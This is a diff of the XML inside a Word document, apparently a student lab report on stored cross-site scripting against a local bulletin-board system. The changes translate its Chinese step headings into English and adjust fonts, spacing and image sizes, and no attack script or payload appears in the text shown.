--- a/University/IS/XSS-1130320118.docx
+++ b/University/IS/XSS-1130320118.docx
@@ -275,10 +275,7 @@
         <w:pStyle w:val="TextBody"/>
         <w:spacing w:before="240" w:after="0"/>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -292,7 +289,21 @@
           <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>）深入理解跨站脚本攻击概念；</w:t>
+        <w:t>）</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Understand what is XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>；</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -307,7 +318,15 @@
       </w:r>
       <w:r>
         <w:rPr/>
-        <w:t>）掌握形成跨站脚本漏洞的条件；</w:t>
+        <w:t>）</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>Learn the requirement of XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>；</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -322,7 +341,11 @@
       </w:r>
       <w:r>
         <w:rPr/>
-        <w:t>）掌握对跨站脚本的几种利用方式。</w:t>
+        <w:t>）</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>Learn some method of XSS.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -356,11 +379,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>熟悉留言系统</w:t>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Learn how to use the bbs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -376,7 +399,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
+          <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:t xml:space="preserve">login windows and open </w:t>
@@ -385,6 +408,8 @@
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
+            <w:sz w:val="21"/>
+            <w:szCs w:val="21"/>
           </w:rPr>
           <w:t>http://10.1.1.2</w:t>
         </w:r>
@@ -398,26 +423,16 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="3">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>265430</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>101600</wp:posOffset>
+              <wp:posOffset>50800</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="5092700" cy="2863850"/>
+            <wp:extent cx="4740910" cy="2665730"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
             <wp:docPr id="2" name="Image1" descr=""/>
@@ -442,7 +457,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5092700" cy="2863850"/>
+                      <a:ext cx="4740910" cy="2665730"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -538,25 +553,21 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
         <w:t>leave some massage on the site</w:t>
       </w:r>
     </w:p>
@@ -569,13 +580,13 @@
       <w:r>
         <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="4">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="3">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
+              <wp:posOffset>318135</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
+              <wp:posOffset>125095</wp:posOffset>
             </wp:positionV>
             <wp:extent cx="4658995" cy="2620645"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
@@ -801,57 +812,24 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>存储式跨站脚本测试</w:t>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Persistent XSS test</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -863,18 +841,17 @@
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
         <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>open the bbs</w:t>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Open the bbs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -894,15 +871,15 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="5">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="4">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>525145</wp:posOffset>
+              <wp:posOffset>323850</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>234315</wp:posOffset>
+              <wp:posOffset>149860</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="3759200" cy="2114550"/>
+            <wp:extent cx="4688205" cy="2637155"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
             <wp:docPr id="4" name="Image3" descr=""/>
@@ -927,7 +904,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3759200" cy="2114550"/>
+                      <a:ext cx="4688205" cy="2637155"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1051,24 +1028,59 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
         <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>在留言内容中填写包含有跨站测试的脚本，提交后观察返回效果。</w:t>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Write scripts in comments</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1088,7 +1100,7 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="6">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="5">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>393700</wp:posOffset>
@@ -1096,7 +1108,7 @@
             <wp:positionV relativeFrom="paragraph">
               <wp:posOffset>136525</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="3402330" cy="1913890"/>
+            <wp:extent cx="4712970" cy="2651125"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
             <wp:docPr id="5" name="Image4" descr=""/>
@@ -1121,7 +1133,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3402330" cy="1913890"/>
+                      <a:ext cx="4712970" cy="2651125"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1245,51 +1257,134 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>submit and watch</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="7">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="6">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:posOffset>523240</wp:posOffset>
+              <wp:posOffset>292100</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>262255</wp:posOffset>
+              <wp:posOffset>169545</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="4276090" cy="2405380"/>
+            <wp:extent cx="4822825" cy="2712720"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
             <wp:docPr id="6" name="Image5" descr=""/>
@@ -1314,7 +1409,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4276090" cy="2405380"/>
+                      <a:ext cx="4822825" cy="2712720"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1333,179 +1428,152 @@
         <w:spacing w:before="240" w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:before="240" w:after="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>储式跨站漏洞的简单利用</w:t>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
